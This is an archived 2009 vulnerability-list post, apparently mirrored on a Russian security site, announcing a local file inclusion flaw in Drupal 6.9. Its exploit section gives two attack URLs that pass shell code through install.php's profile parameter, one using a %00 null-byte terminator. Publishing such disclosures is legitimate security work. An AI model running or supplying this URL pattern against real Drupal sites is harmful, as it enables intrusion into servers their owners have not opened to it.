Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_102$2009] BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability

  [BMSA-2009-02] XML injection in PyBlosxom

From:rasool.nasr_(at)_gmail.com <rasool.nasr_(at)_gmail.com>
Date:10 февраля 2009 г.
Subject:LFI in Drupal CMS

Author : Rasool Nasr

-------------------------------------------

Discovered by : Rasool Nasr

-------------------------------------------

Exploited By : Rasool Nasr

-------------------------------------------

E-Mail : [email protected]

-------------------------------------------

WebSite : http://ircrash.com

-------------------------------------------

Our Team : ircrash

-------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

-------------------------------------------

CMS: Drupal ( Version 6.9 )

Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz

-------------------------------------------

LFI

Exploit :

http://[sitename]/drupal/install.php?profile=[shell code]


or


http://[sitename]/drupal/install.php?profile=[shell code]%00
-------------------------------------------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород